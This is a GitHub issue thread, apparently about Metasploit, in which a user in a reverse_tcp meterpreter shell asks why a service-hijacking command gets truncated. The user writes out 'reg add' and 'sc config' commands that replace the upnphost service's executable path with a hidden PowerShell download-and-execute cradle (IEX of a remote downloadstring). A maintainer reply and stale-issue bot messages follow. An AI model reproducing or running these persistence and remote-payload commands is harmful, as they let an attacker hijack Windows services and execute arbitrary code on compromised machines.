You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
It looks like you are pasting a large string into a cmd shell, is that the case? Is this a shell type session, or a shell inside a meterpreter session? What is the victim operating system?
The cutoff appears to be near 255 bytes, which is quite low for a max line length, but not unheard of.
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
It’s been 60 days since anything happened on this issue, so we are going to close it.
Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
sessions 1
shell
///////////input//////////
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\upnphost\ /v ImagePath /t REG_EXPAND_SZ /d "cmd.exe /c ping 127.0.0.1 -n 30 > nul & cmd.exe /c powershell.exe -nop -w hidden -c $p=new-object net.webclient;$p.proxy=[Net.WebRequest]::GetSystemWebProxy();$p.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $p.downloadstring('http://testsite.com/test.php')" /f
//////////output reg key value data//////////
cmd.exe /c ping 127.0.0.1 -n 30 > nul & cmd.exe /c powershell.exe -nop -w hidden -c $p=new-object net.webclient;$p.proxy=[Net.WebRequest]::GetSystem
//////////input//////////
sc config upnphost binpath= "cmd.exe /c ping 127.0.0.1 -n 30 > nul & cmd.exe /c powershell.exe -nop -w hidden -c $p=new-object net.webclient;$p.proxy=[Net.WebRequest]::GetSystemWebProxy();$p.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $p.downloadstring('http://testsite.com/test.php')"
//////////output reg key value data//////////
cmd.exe /c ping 127.0.0.1 -n 30 > nul & cmd.exe /c powershell.exe -nop -w hidden -c $p=new-object net.webclient;$p.proxy=[Net.WebRequest]::GetSystemWebProxy();$p.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX
x64/reverse_tcp sessions cmd shell
why reg_key value cut?(bug? or remote cmd length limit?)
The text was updated successfully, but these errors were encountered: